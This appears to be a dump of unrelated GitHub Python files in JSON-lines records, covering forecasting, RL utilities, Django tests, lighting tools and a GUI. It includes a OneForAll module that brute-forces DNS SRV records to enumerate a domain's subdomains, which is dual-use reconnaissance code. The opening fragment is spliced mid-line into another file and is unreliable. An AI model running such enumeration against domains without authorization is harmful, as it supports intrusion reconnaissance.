X_test_future, y_test_future, top_parameters_dict)\r\n print(\"Model applied on: \",df_future.columns[0])\r\n print(\"Model: \",model_xgb)\r\n\r\n print(\"################################################################################################################################\")\r\n\r\n print(\"Forecasting future values: \",df_future.columns[0])\r\n y_pred = predict_against_test(model_xgb, X_test_future)\r\n preds.append(y_pred)\r\n\r\n # print(\"################################################################################################################################\")\r\n\r\n test_future['Forecasted Prices'] = y_pred\r\n df_future = df_future.merge(test_future[['Forecasted Prices']], how = 'left', left_index = True, right_index = True)\r\n\r\n # print(\"################################################################################################################################\")\r\n\r\n ### Setting index from timestamp to t-mins \r\n print(\"Setting index from timestamp to t-mins\")\r\n df_future.index = ((pd.to_datetime(df_future.columns[0]) - \r\n (df_future.index))\r\n .astype('>2\r\n freqe[eva[i]] += 1\r\n \r\n for i in range(o):\r\n oda[i] = oda[i]>>2\r\n freqo[oda[i]] += 1\r\n #print(freqe[:5], freqo[:5])\r\n for i in range(250001):\r\n if freqe[i]>1:\r\n count -= (freqe[i]*(freqe[i]-1))//2\r\n if freqo[i]>1:\r\n count -= (freqo[i]*(freqo[i]-1))//2\r\n \r\n print(count)","repo_name":"Gauraviiitian/Codechef_Solutions_Codes","sub_path":"XORIER.py","file_name":"XORIER.py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"21549362125","text":"import gym\nimport torch\nimport numpy as np\n\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n\ndef get_env_dim(env):\n \"\"\"Get observation and action dimensions\n Args:\n env (gym env): Gym environment from gym_env folder\n \"\"\"\n if isinstance(env.observation_space, gym.spaces.Box):\n env_n_obs = env.observation_space.shape[0]\n else:\n env_n_obs = env.observation_space.n\n\n if isinstance(env.action_space, gym.spaces.Box):\n env_n_action = env.action_space.shape[0]\n else:\n env_n_action = env.action_space.n\n\n return env_n_obs, env_n_action\n\n\ndef get_env_action_type(env):\n \"\"\"Get action space type (whether discrete or continuous space)\n Args:\n env (gym env): Gym environment from gym_env folder\n \"\"\"\n if isinstance(env.action_space, gym.spaces.Discrete):\n is_discrete_action = True\n action_dtype = np.int64\n else:\n is_discrete_action = False\n action_dtype = np.float32\n\n return is_discrete_action, action_dtype\n\n\ndef to_transition(obs, actions, reward, next_obs, agent, args):\n \"\"\"Concatenate and transform transition into vector\n Args:\n obs (np.ndarray): Observation\n actions (list): List of np.arrays that represents joint action\n reward (np.ndarray): Reward\n next_obs (np.ndarray): Next observation\n agent (algorithm.*): Agent class in algorithm folder\n args (argparse): Python argparse that contains arguments\n \"\"\"\n if not isinstance(obs, torch.Tensor):\n obs = torch.tensor(obs, dtype=torch.float32, device=agent.device)\n\n if not isinstance(actions, torch.Tensor):\n actions = np.array(actions, dtype=np.int64).reshape(1, -1)\n actions = torch.tensor(actions, dtype=torch.int64, device=agent.device)\n actions_onehot = [\n to_onehot(actions[..., i_agent], dim=agent.env_n_action)\n for i_agent in range(args.n_agent)]\n actions_onehot = torch.cat(actions_onehot, dim=-1).float()\n\n if not isinstance(reward, torch.Tensor):\n reward = torch.tensor(reward, dtype=torch.float32, device=agent.device).unsqueeze(1)\n\n if not isinstance(next_obs, torch.Tensor):\n next_obs = torch.tensor(next_obs, dtype=torch.float32, device=agent.device)\n\n return torch.cat([obs, actions_onehot, reward, next_obs], dim=-1)\n\n\ndef to_onehot(value, dim):\n \"\"\"Convert batch of tensor numbers to onehot\n Args:\n value (numpy.ndarray or torch.Tensor): Batch of numbers to convert to onehot\n dim (int): Dimension of onehot\n Returns:\n onehot (numpy.ndarray or torch.Tensor): Converted onehot\n References:\n https://gist.github.com/NegatioN/acbd8bb6be866ce1831b2d073fd7c450\n \"\"\"\n if isinstance(value, np.ndarray):\n assert len(value.shape) == 1, \"Shape must be (batch,)\"\n onehot = np.eye(dim, dtype=np.float32)[value]\n assert onehot.shape == (value.shape[0], dim), \"Shape must be: (batch, dim)\"\n elif isinstance(value, torch.Tensor):\n scatter_dim = len(value.size())\n y_tensor = value.view(*value.size(), -1)\n zeros = torch.zeros(*value.size(), dim, dtype=value.dtype, device=value.device)\n onehot = zeros.scatter(scatter_dim, y_tensor, 1)\n else:\n raise ValueError(\"Not supported data type\")\n\n return onehot\n\n\ndef reparameterization(mean, logvar):\n \"\"\"Perform sampling based on reparameterization\n Args:\n mean (torch.Tensor): Mean of normal distribution\n logvar (torch.Tensor): Log variance of normal distribution\n Returns:\n z (torch.Tensor): Sampled logit based on reparameterization\n References:\n https://github.com/kampta/pytorch-distributions/blob/master/gaussian_vae.py\n \"\"\"\n var = torch.exp(0.5 * logvar)\n distribution = torch.distributions.Normal(mean, var)\n z = distribution.rsample()\n return z\n","repo_name":"dkkim93/further","sub_path":"misc/rl_utils.py","file_name":"rl_utils.py","file_ext":"py","file_size_in_byte":3879,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"32"} +{"seq_id":"31279759165","text":"import unittest\n\nfrom classes.guest import Guest\nfrom classes.venue import Venue\nfrom classes.bar import Bar\n\n\nclass TestGuest(unittest.TestCase):\n \n def setUp(self):\n self.guest_1 = Guest(\"Tony\", 150.00, \"Toujours Plus Con\")\n self.guest_2 = Guest(\"Will\", 100.00, \"Bohemian Rapsody\")\n self.guest_3 = Guest(\"Calum\", 150.00, \"Could You Be Loved\")\n self.guest_4 = Guest(\"Lewis\", 200.00, \"Flower Of Scotland\")\n self.guest_5 = Guest(\"Jordan\", 300.00, \"I Was Made For Lovin You\")\n\n self.drink_1 = Bar(\"Irn Bru\", 2.00)\n self.drink_2 = Bar(\"Rince Cochon\", 5.00)\n self.drink_3 = Bar(\"Chablis\", 10.00)\n\n def test_guest_has_name(self):\n self.assertEqual(\"Lewis\", self.guest_4.name)\n\n def test_guest_has_wallet(self):\n self.assertEqual(150.00, self.guest_1.wallet)\n\n def test_guest_can_buy_drink__decreases_money(self): \n self.guest_5.buy_drink(self.drink_2)\n self.assertEqual(295.00, self.guest_5.wallet)\n\n def test_guest_cannot_buy_if_insufficient_money(self):\n poor_guest = Guest(\"Alex\", 1.00, \"Voulez-Vous\")\n poor_guest.buy_drink(self.drink_3)\n self.assertEqual(1.00, poor_guest.wallet)","repo_name":"ByAnthony/the_codeclan_karaoke","sub_path":"tests/guest_test.py","file_name":"guest_test.py","file_ext":"py","file_size_in_byte":1201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"7751450891","text":"from django.shortcuts import render\nfrom django.core.files.storage import FileSystemStorage\n\nfrom .forms import DataForm\n\nfrom model.Controller import Controller\n\ndef index(response):\n if response.method == 'POST': \n form = DataForm(response.POST, response.FILES)\n if form.is_valid(): \n data = form.cleaned_data[\"data\"] \n targets = form.cleaned_data[\"targets\"]\n model_type = form.cleaned_data[\"model_type\"]\n file_system = FileSystemStorage()\n file_system.save(data.name, data)\n file_system.save(targets.name, targets)\n controller = Controller()\n graph_test, graph_validation = controller.model_controller(data.name, targets.name, model_type)\n model_type = True if model_type == \"1\" else False\n return render(response, \"model_view/results.html\", {\"model_type\":model_type,\"chart_test\": graph_test, \"chart_validation\":graph_validation})\n else:\n form = DataForm()\n return render(response, \"model_view/home.html\", {\"form\":form})\n\ndef results(response):\n return render(response, \"model_view/results.html\", {})\n","repo_name":"Sofia-29/Coding-Challenge","sub_path":"src/web_server/model_view/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1149,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"15235738265","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Nov 29 15:18:44 2018\n\n@author: Florian\n\"\"\"\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom io import StringIO\nimport warnings\nimport struct\nimport os\n\n\ndef loadIES(fname):\n print(\"loading: \"+fname)\n fid = open(fname)\n PhotometricData = {\"header\": []}\n\n while True:\n line = fid.readline()\n PhotometricData[\"header\"].extend([line])\n if line.find('TILT') != -1:\n break\n\n keys = [\"# of lamps\", \"lumens/lamp\", \"multiplier\", \"# of vertical angles\",\n \"# of horizontal angles\", \"photometric type\", \"unj-ts type\",\n \"width\", \"length\", \"height\", \"ballast factor\",\n \"ballast lamp photometric factor\", \"input watts\"]\n values = []\n for i, key in enumerate(keys):\n # values may be written in several lines...\n if i == len(values):\n values.extend(fid.readline().split(' '))\n value_string = values[i].replace(\"\\n\", \"\")\n if '.' in value_string:\n value = float(value_string)\n else:\n value = int(value_string)\n PhotometricData[key] = value\n print(i, key, value_string)\n arr = np.loadtxt(StringIO(fid.read().replace('\\n', ' ')))\n fid.close()\n\n v_angle = PhotometricData[\"# of vertical angles\"]\n h_angle = PhotometricData[\"# of horizontal angles\"]\n\n PhotometricData[\"vertical angles\"] = arr[:v_angle]\n PhotometricData[\"horizontal angles\"] = arr[v_angle:(v_angle + h_angle)]\n candela = arr[v_angle + h_angle:]\n PhotometricData[\"candela values\"] = candela.reshape((h_angle, -1))\n elements = PhotometricData[\"candela values\"].shape[1]\n if elements != v_angle:\n msg = \"expected {:.0f} rows, but got {:.0f} rows\".format(v_angle,\n elements)\n warnings.warn(msg)\n return PhotometricData\n\n\ndef to_struct(left, bottom, width, height, t_width, t_height, t_depth, data):\n \"\"\"\n \"\"\"\n print(\"left:\", left)\n print(\"bottom:\", bottom)\n print(\"width:\", width)\n print(\"height:\", height)\n print(\"texture width:\", t_width)\n print(\"texture height:\", t_height)\n print(\"texture depth:\", t_depth)\n print(\"first element:\", data[0])\n print(\"second element:\", data[1])\n print(\"last element:\", data[-1])\n extent = (left, left+width, bottom, bottom+height)\n plt.imshow(np.sum(data, axis=0), interpolation=\"nearest\", cmap=\"gray\",\n origin=\"lower\", extent=extent, vmin=0, vmax=255)\n plt.show()\n data.shape = data.size # flatten data\n # '?' -> _BOOL , 'h' -> short, 'i' -> int and 'l' -> long\n binary = struct.pack('ffffiii', left, bottom, width, height, t_width,\n t_height, t_depth) + data.tobytes()\n # t_width.to_bytes(1, 'big')\n return binary\n\n\ndef plot(ies):\n x = ies[\"horizontal angles\"]\n y = ies[\"vertical angles\"]\n z = ies[\"candela values\"]\n z.shape = (x.shape[0], y.shape[0])\n extent = (x.min(), x.max(), y.min(), y.max())\n plt.imshow(z.T, interpolation=\"nearest\", extent=extent, cmap=\"gray\",\n origin=\"lower\")\n plt.show()\n\n\ndef rescale(data):\n \"\"\"Transposes a 3D input array to the right order.\n Rescales all values in data to a value range 0 to 255.\n Casts data to unsigned 8 bit integer.\n Returns a contiguous array in memory (C order).\n \"\"\"\n assert data.ndim == 3, \"data should be 3D\"\n data = data.transpose(2, 0, 1) # makes a deep-copy\n min_ = np.min(data)\n max_ = np.max(np.sum(data, axis=0))\n range_ = max_ - min_\n assert (range_ > 0.0), \"data set contains only one value.\"\n rescaled_data = data-min_\n rescaled_data *= (255/range_)\n return np.ascontiguousarray(np.round(rescaled_data, decimals=0), np.uint8)\n\n\ndef ies2mlb(path, n_lights):\n names_pl = [x for x in os.listdir(path) if x.endswith(\".ies\")]\n assert n_lights <= len(names_pl), \"requested more photometric lights than available in the path \"+path\n\n test_ies = loadIES(path+names_pl[0])\n t_height = test_ies[\"# of vertical angles\"]\n t_width = test_ies[\"# of horizontal angles\"]\n an_hor = test_ies[\"horizontal angles\"]\n an_ver = test_ies[\"vertical angles\"]\n\n max_texture_size = 2048\n if t_width > max_texture_size:\n cut = (t_width-max_texture_size)//2+1\n hs, he = cut, (t_width-cut)\n an_hor = an_hor[hs:he]\n t_width = len(an_hor)\n warnings.warn(\"texture will be cropped! {:.0f} pixels from the left and right are cut off.\".format(cut))\n else:\n hs, he = 0, t_width\n if t_height > max_texture_size:\n cut = (t_height-max_texture_size)//2+1\n vs, ve = cut, (t_height-cut)\n an_ver = an_ver[vs: ve]\n t_height = len(an_ver)\n warnings.warn(\"texture will be cropped! {:.0f} upper and lower pixels are cut off.\".format(cut))\n else:\n vs, ve = 0, t_height\n\n left = np.radians(an_hor[0])\n bottom = np.radians(an_ver[0])\n width = np.radians(an_hor[-1]-an_hor[0])\n height = np.radians(an_ver[-1] - an_ver[0])\n\n all_pl = np.zeros((t_height, t_width, n_lights))\n for i in range(n_lights):\n photometric_light = loadIES(path+names_pl[i])\n all_pl[:, :, i] = (photometric_light[\"candela values\"].T)[vs:ve, hs:he]\n\n data_byte = rescale(all_pl)\n return to_struct(left, bottom, width, height, t_width, t_height, n_lights,\n data_byte)\n\n\ndef img2mlb(p):\n img = plt.imread(p)\n t_height, t_width, t_depth = img.shape\n img = np.ascontiguousarray(img[::-1, :, :])\n data_byte = rescale(img)\n w, h = np.radians(30), np.radians(20)\n return to_struct(-w/2, -h/2, w, h, t_width, t_height, t_depth, data_byte)\n\n\ndef rndmlb(h, w, d, h_deg, w_deg, sig):\n\n all_lights = np.zeros((h, w, d))\n for i in range(d):\n x = np.linspace(-w_deg/2, w_deg/2, w) + (np.random.rand()-.5)*w_deg\n y = np.linspace(-h_deg/2, h_deg/2, h) + (np.random.rand()-.5)*h_deg\n xx, yy = np.meshgrid(x, y)\n all_lights[..., i] = np.exp(-(xx**2 + yy**2) / (2. * sig**2))\n data_byte = rescale(all_lights)\n\n w_rad, h_rad = np.radians(w_deg), np.radians(h_deg)\n print(-w/2, -h/2, w, h, w, h, d)\n return to_struct(-w_rad/2, -h_rad/2, w_rad, h_rad, w, h, d, data_byte)\n\n\ndef example_ies2mlb():\n p = \"D:/covise_stuff/MatrixScheinwerfer/96P_Lichtverteilung+Vorfeld/\"\n binary = ies2mlb(p, 96)\n fh = open(\"D:/covise_stuff/MatrixScheinwerfer/PhotometricMatrixLights.mlb\",\n \"wb\")\n fh.write(binary)\n fh.close()\n return\n\n\ndef make_random_mlb():\n fh = open(\"D:/covise_stuff/MatrixScheinwerfer/test_rand1.mlb\", \"wb\")\n# binary = rndmlb(h=100, w=20, d=20, h_deg=5, w_deg=10, sig=.3)\n binary = rndmlb(h=100, w=200, d=20, h_deg=15, w_deg=30, sig=1)\n fh.write(binary)\n fh.close()\n return\n\n\ndef example_img2mlb():\n binary = img2mlb(\"D:/covise_stuff/sample_small.png\")\n fh = open(\"D:/covise_stuff/MatrixScheinwerfer/test.mlb\", \"wb\")\n fh.write(binary)\n fh.close()\n return\n\n\nif __name__ == \"__main__\":\n make_random_mlb()\n# example_img2mlb()\n# example_ies2mlb()\n print(\"done.\")\n","repo_name":"hlrs-vis/covise","sub_path":"src/OpenCOVER/plugins/general/Vrml97/ExampleMatrixLight/make_MatrixLightBinary.py","file_name":"make_MatrixLightBinary.py","file_ext":"py","file_size_in_byte":7121,"program_lang":"python","lang":"en","doc_type":"code","stars":166,"dataset":"github-code","pt":"32"} +{"seq_id":"43306609280","text":"try:\n from django import VERSION as django_version\n\nexcept ImportError:\n from django import __version__ as django_version\n django_version = list(map(int, django_version.split('.')[:2]))\n\nfrom django.db import connection\nfrom django.test import TestCase, TransactionTestCase\n\nfrom unittest import skipIf\n\ntry:\n from unittest import mock\n\nexcept ImportError:\n import mock\n\nfrom . import atomic, commit, rollback\nfrom .test import connections_support_transactions\nfrom .models import Model1\n\n\ndef _supports_atomic():\n \"\"\"Return True if Django version requires patching.\"\"\"\n return django_version[:2] >= (1, 6)\n\n\ndef _function():\n \"\"\"\n A function for testing.\n \"\"\"\n assert connection.in_atomic_block, 'Attribute should be True'\n\n\n@skipIf(not _supports_atomic(), 'Atomic support is not built in')\nclass DefaultTestCase(TransactionTestCase):\n \"\"\"\n Test Case for Django with built-in atomic.\n \"\"\"\n\n def test_import(self):\n \"\"\"Test that patching was done.\"\"\"\n # Import \"real\" implementation.\n from django.db.transaction import atomic as _atomic\n from django.db.transaction import commit as _commit\n from django.db.transaction import rollback as _rollback\n\n # Ensure the originals are used.\n self.assertEqual(atomic, _atomic)\n self.assertEqual(commit, _commit)\n self.assertEqual(rollback, _rollback)\n\n\n@skipIf(_supports_atomic(), 'Atomic support is built in')\nclass BackportTestCase(TestCase):\n \"\"\"\n Test Case for Django lacking atomic.\n \"\"\"\n\n def test_decorator(self):\n \"\"\"Test atomic used as wrapper.\"\"\"\n wrapped = atomic(_function)\n wrapped()\n\n def test_nested_fun(self):\n \"\"\"Test nested atomic usage as wrapper and decorator.\"\"\"\n wrapped = atomic(_function)\n\n @atomic\n def nesting():\n return wrapped()\n\n nesting()\n\n def test_nested_ctx(self):\n \"\"\"Test atomic used as context manager.\"\"\"\n wrapped = atomic(_function)\n\n with atomic():\n wrapped()\n\n\nclass BleedoverTestCase(TestCase):\n \"\"\"\n Test Case for test isolation.\n \"\"\"\n\n def test_one(self):\n \"\"\"Ensure objects do not bleed over between tests.\"\"\"\n self.assertTrue(connections_support_transactions())\n\n with atomic():\n # First create an object.\n Model1.objects.create(name='1: does it bleed?')\n\n # Then ensure only that object exists.\n self.assertEqual(1, Model1.objects.all().count())\n\n def test_two(self):\n \"\"\"Ensure objects do not bleed over between tests.\"\"\"\n self.assertTrue(connections_support_transactions())\n\n with atomic():\n # First create an object.\n Model1.objects.create(name='2: does it bleed?')\n\n # Then ensure only that object exists.\n self.assertEqual(1, Model1.objects.all().count())\n\n\nclass TransactionBleedoverTestCase(TransactionTestCase):\n \"\"\"\n Test Case for transaction test isolation.\n \"\"\"\n\n def test_one(self):\n \"\"\"Ensure objects do not bleed over between tests.\"\"\"\n self.assertTrue(connections_support_transactions())\n\n with atomic():\n # First create an object.\n Model1.objects.create(name='1: does it bleed?')\n\n # Then ensure only that object exists.\n self.assertEqual(1, Model1.objects.all().count())\n\n def test_two(self):\n \"\"\"Ensure objects do not bleed over between tests.\"\"\"\n self.assertTrue(connections_support_transactions())\n\n with atomic():\n # First create an object.\n Model1.objects.create(name='2: does it bleed?')\n\n # Then ensure only that object exists.\n self.assertEqual(1, Model1.objects.all().count())\n\n\n@skipIf(_supports_atomic(), 'Atomic support is built in')\nclass ProxyTestCase(TestCase):\n \"\"\"\n Test Case for Database / Features Proxies.\n \"\"\"\n\n def test_features(self):\n \"\"\"Test that features is accessible.\"\"\"\n from . import get_connection\n\n connection = get_connection()\n self.assertTrue(connection.features.supports_select_related)\n\n\nclass CrossVersionTransactionTestCase(TransactionTestCase):\n \"\"\"\n Test Case for Django 1.4/5 with atomic.\n \"\"\"\n\n def test_rollback(self):\n \"\"\"\n Test that saved objects are rolled back on an error.\n \"\"\"\n with self.assertRaises(Exception):\n with atomic():\n Model1.objects.create(name='I should be rolled back.')\n raise Exception()\n\n self.assertEqual(0, Model1.objects.all().count())\n\n def test_cross_versions(self):\n \"\"\"\n Test that new and old transaction handling work together.\n \"\"\"\n try:\n from django.db.transaction import commit_unless_managed\n except ImportError:\n return\n\n class Sentinal(Exception):\n pass\n\n @atomic\n def new():\n old()\n Model1.objects.create(name='Inside new atomic transaction')\n raise Sentinal()\n\n def old():\n Model1.objects.create(name='Inside old school transaction')\n # This should NOT commit!\n commit_unless_managed()\n\n with self.assertRaises(Sentinal):\n new()\n\n self.assertEqual(0, Model1.objects.all().count())\n","repo_name":"btimby/django-transaction-atomic","sub_path":"django_transaction_atomic/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":5368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"17411808479","text":"from PyQt5.QtWidgets import QWidget, QLabel, QGridLayout, QHBoxLayout, QVBoxLayout, QRadioButton, QComboBox, \\\n QColorDialog, QPushButton, QStyleFactory, QGroupBox, QSpinBox, QSlider, QCheckBox, QApplication\nfrom PyQt5.QtCore import Qt\n\nfrom screeninfo import get_monitors\nfrom .GUI_variables import ScreenVariables\n\n\nclass TabScreen(QWidget):\n topLeftGroupBox = None\n topRightGroupBox = None\n bottomGroupBox = None\n\n ColorPickerBtn = None\n\n def __init__(self, parent, rgb_effects):\n super(TabScreen, self).__init__(parent)\n self.parent = parent\n self.rgb_effects = rgb_effects\n svars: ScreenVariables = rgb_effects.gvars.svars\n\n ####\n # WIDGETS\n ####\n\n self.ActiveCheckbox = QCheckBox(\"Screen Mirroring\")\n self.ActiveCheckbox.stateChanged.connect(self.activateScreenRecording)\n\n self.OptionsBox = QGroupBox()\n\n ScreenModeLabel = QLabel(\"Mode\")\n ScreenModeDropdown = QComboBox()\n ScreenModeDropdown.addItems([\"Average\", \"Squared Average\", \"Fast\"])\n ScreenModeDropdown.setCurrentText('Average')\n ScreenModeDropdown.currentIndexChanged.connect(svars.setScreenMode)\n\n SaturationBoostLabel = QLabel(\"Saturation Boost\")\n SaturationBoostEntry = QSpinBox()\n SaturationBoostEntry.setMinimum(-255)\n SaturationBoostEntry.setMaximum(255)\n SaturationBoostEntry.setValue(svars.saturation_boost)\n SaturationBoostEntry.setToolTip(\"increase/decrease the saturation\")\n SaturationBoostEntry.valueChanged.connect(svars.setSaturationBoost)\n FullscreenCheckbox = QCheckBox(\"Fullscreen\")\n FullscreenCheckbox.stateChanged.connect(svars.setFullScreen)\n\n screen = get_monitors()[0]\n\n WidthLabel = QLabel(\"Width\")\n WidthEntry = QSpinBox()\n WidthEntry.setMinimum(1)\n WidthEntry.setMaximum(screen.width)\n WidthEntry.setValue(svars.capture_width)\n WidthEntry.setToolTip(\"Insert the width (in pixels) of the capture area\")\n WidthEntry.valueChanged.connect(svars.setWidth)\n HeightLabel = QLabel(\"Height\")\n HeightEntry = QSpinBox()\n HeightEntry.setMinimum(1)\n HeightEntry.setMaximum(screen.height)\n HeightEntry.setValue(svars.capture_width)\n HeightEntry.setToolTip(\"Insert the height (in pixels) of the capture area\")\n HeightEntry.valueChanged.connect(svars.setHeight)\n XOffsetLabel = QLabel(\"X offset\")\n XOffsetEntry = QSpinBox()\n XOffsetEntry.setMinimum(0)\n XOffsetEntry.setMaximum(screen.width - 1)\n XOffsetEntry.setValue(svars.capture_x_offset)\n XOffsetEntry.setToolTip(\"Horizontal offset (in pixels) from the left edge of the screen\")\n XOffsetEntry.valueChanged.connect(svars.setXOffset)\n YOffsetLabel = QLabel(\"Y offset\")\n YOffsetEntry = QSpinBox()\n YOffsetEntry.setMinimum(0)\n YOffsetEntry.setMaximum(screen.height - 1)\n YOffsetEntry.setValue(svars.capture_y_offset)\n YOffsetEntry.setToolTip(\"Vertical offset (in pixels) from the top edge of the screen\")\n YOffsetEntry.valueChanged.connect(svars.setyOffset)\n\n ####\n # LAYOUT\n ####\n\n optionsLayout = QGridLayout()\n optionsLayout.addWidget(ScreenModeLabel, 0, 0)\n optionsLayout.addWidget(ScreenModeDropdown, 0, 1)\n optionsLayout.addWidget(SaturationBoostLabel, 1, 0)\n optionsLayout.addWidget(SaturationBoostEntry, 1, 1)\n optionsLayout.addWidget(FullscreenCheckbox, 2, 0)\n optionsLayout.addWidget(WidthLabel, 3, 0)\n optionsLayout.addWidget(WidthEntry, 3, 1)\n optionsLayout.addWidget(HeightLabel, 4, 0)\n optionsLayout.addWidget(HeightEntry, 4, 1)\n optionsLayout.addWidget(XOffsetLabel, 5, 0)\n optionsLayout.addWidget(XOffsetEntry, 5, 1)\n optionsLayout.addWidget(YOffsetLabel, 6, 0)\n optionsLayout.addWidget(YOffsetEntry, 6, 1)\n self.OptionsBox.setLayout(optionsLayout)\n\n tabLayout = QGridLayout()\n tabLayout.addWidget(self.ActiveCheckbox, 0, 0)\n tabLayout.addWidget(self.OptionsBox, 1, 0)\n\n self.setLayout(tabLayout)\n\n def activateScreenRecording(self, state):\n \"\"\"\n Turn On/Off screen mirroring. Enables/Disables hte Screen Mirroring tab\n\n :param state:\n \"\"\"\n registered_mode = self.rgb_effects.gvars.mode\n if registered_mode not in ('screen_mirroring','off'):\n mode = registered_mode\n else:\n mode = 'screen_mirroring' if state else 'off'\n\n # set the mode\n self.rgb_effects.gvars.setMode(self.rgb_effects, mode)\n\n # (GUI) check the appropriate radio button in the general tab\n for i, radio in enumerate(self.parent.tab_general.RGBSelectionRadio):\n if radio[1] == mode:\n radio[0].setChecked(True)\n break\n\n # (GUI) enable/disable this tab\n self.OptionsBox.setEnabled(state)\n\n def enableUI(self, state):\n self.OptionsBox.setEnabled(state)\n self.ActiveCheckbox.blockSignals(True) # prevent triggering activateScreenRecording(state)\n self.ActiveCheckbox.setChecked(state)\n self.ActiveCheckbox.blockSignals(False)\n","repo_name":"Hilicot/WLED_E131_PC_Client","sub_path":"gui/tab_screen_mirroring.py","file_name":"tab_screen_mirroring.py","file_ext":"py","file_size_in_byte":5261,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"32"} +{"seq_id":"29521252449","text":"\"\"\"\n通过枚举域名常见的SRV记录并做查询来发现子域\n\"\"\"\n\nimport queue\nimport threading\n\nfrom common import utils\nfrom common.module import Module\nfrom config.setting import data_storage_dir\n\n\nclass BruteSRV(Module):\n def __init__(self, domain):\n Module.__init__(self)\n self.domain = domain\n self.module = 'BruteSRV'\n self.source = \"BruteSRV\"\n self.qtype = 'SRV'\n self.thread_num = 20\n self.names_queue = queue.Queue()\n self.answers_queue = queue.Queue()\n\n def fill_queue(self):\n path = data_storage_dir.joinpath('srv_prefixes.json')\n prefixes = utils.load_json(path)\n for prefix in prefixes:\n self.names_queue.put(prefix + self.domain)\n\n def do_brute(self):\n for num in range(self.thread_num):\n thread = BruteThread(self.names_queue, self.answers_queue)\n thread.name = f'BruteThread-{num}'\n thread.daemon = True\n thread.start()\n self.names_queue.join()\n\n def deal_answers(self):\n while not self.answers_queue.empty():\n answer = self.answers_queue.get()\n if answer is None:\n continue\n for item in answer:\n record = str(item)\n subdomains = self.match_subdomains(record)\n self.subdomains.update(subdomains)\n\n def run(self):\n self.begin()\n self.fill_queue()\n self.do_brute()\n self.deal_answers()\n self.finish()\n self.save_json()\n self.gen_result()\n self.save_db()\n\n\nclass BruteThread(threading.Thread):\n def __init__(self, names_queue, answers_queue):\n threading.Thread.__init__(self)\n self.names_queue = names_queue\n self.answers_queue = answers_queue\n\n def run(self):\n while True:\n name = self.names_queue.get()\n answer = utils.dns_query(name, 'SRV')\n self.answers_queue.put(answer)\n self.names_queue.task_done()\n\n\nif __name__ == '__main__':\n brute = BruteSRV('zonetransfer.me')\n brute.run()\n","repo_name":"shmilylty/OneForAll","sub_path":"modules/srv.py","file_name":"srv.py","file_ext":"py","file_size_in_byte":2107,"program_lang":"python","lang":"en","doc_type":"code","stars":7171,"dataset":"github-code","pt":"32"} +{"seq_id":"2510279098","text":"from asyncio import constants\nfrom statistics import mode\nfrom turtle import left\nfrom typing import Any, Dict\n\nfrom flamapy.metamodels.fm_metamodel.models import FeatureModel, Feature, Relation, Constraint\nfrom flamapy.metamodels.fm_metamodel.transformations import UVLWriter\n\nfrom flamapy.core.models.ast import AST, ASTOperation, Node\nfrom rhea.refactorings.split_constraint import SplitConstraint\nfrom rhea.refactorings.elimination_complex_constraints import EliminationComplexConstraints\nfrom rhea.refactorings.elimination_simple_ctcs_requires import EliminationSimpleConstraintsRequires\nfrom rhea.refactorings.elimination_simple_ctcs_excludes import EliminationSimpleConstraintsExcludes\n\nfrom rhea.metamodels.fm_metamodel.models import FM, ConstraintHelper\nfrom rhea.refactorings import FMRefactoring\nfrom rhea.refactorings import utils\nfrom rhea.metamodels.fm_metamodel.models import fm_utils\n\n\nREFACTORING_COMPLEX = EliminationComplexConstraints\nREFACTORING_REQUIRES = EliminationSimpleConstraintsRequires\nREFACTORING_EXCLUDES = EliminationSimpleConstraintsExcludes\n\n\nclass EliminationAnyConstraints(FMRefactoring):\n\n @staticmethod\n def get_name() -> str:\n return 'Elimination of Any Constraint from Feature Trees'\n\n @staticmethod\n def get_description() -> str:\n return (\"It eliminates any requested constraint by calling al the other methods\"\n \"of elimination of Constraints.\")\n\n @staticmethod\n def get_language_construct_name() -> str:\n return 'Constraint'\n\n @staticmethod\n def get_instances(model: FeatureModel) -> list[Constraint]:\n return [ctc for ctc in model.get_constraints()]\n\n @staticmethod\n def is_applicable(model: FeatureModel) -> bool:\n return True\n\n @staticmethod\n def transform(model: FeatureModel, instance: Constraint) -> FeatureModel:\n if instance is None:\n raise Exception(f'Constraint {instance} is None.')\n\n if not hasattr(model, 'dict_references'):\n model.dict_references = {}\n \n print(f'MODEL DICT - before: {[(name, value.name) for name, value in model.dict_references.items()]}')\n \n if fm_utils.is_complex_constraint(instance):\n # split\n ctc_list = fm_utils.split_constraint(instance)\n model.get_constraints().remove(instance)\n original_ctcs = set(model.get_constraints())\n model.get_constraints().extend(ctc_list)\n \n for ctc in ctc_list:\n if fm_utils.is_complex_constraint(ctc):\n # aplicas el refactoring del complex\n model = REFACTORING_COMPLEX.transform(model, ctc)\n\n new_ctcs = set(model.get_constraints()) - original_ctcs\n\n for ctc in new_ctcs:\n if fm_utils.is_requires_constraint(ctc):\n #print(f'Applying the refactoring {REFACTORING_REQUIRES.get_name()}...')\n model = REFACTORING_REQUIRES.transform(model, ctc)\n # UVLWriter(model, f\"salida{ctc}.uvl\").transform()\n elif fm_utils.is_excludes_constraint(ctc):\n #print(f'Applying the refactoring {REFACTORING_EXCLUDES.get_name()}...')\n model = REFACTORING_EXCLUDES.transform(model, ctc)\n # UVLWriter(model, f\"salida{ctc}.uvl\").transform()\n else:\n raise Exception(f'Invalid simple constraint: {ctc}')\n else:\n if fm_utils.is_requires_constraint(instance):\n #print(f'Applying the refactoring {REFACTORING_REQUIRES.get_name()}...')\n model = REFACTORING_REQUIRES.transform(model, instance)\n # UVLWriter(model, f\"salida{instance}.uvl\").transform()\n elif fm_utils.is_excludes_constraint(instance):\n #print(f'Applying the refactoring {REFACTORING_EXCLUDES.get_name()}...')\n model = REFACTORING_EXCLUDES.transform(model, instance)\n # UVLWriter(model, f\"salida{instance}.uvl\").transform()\n 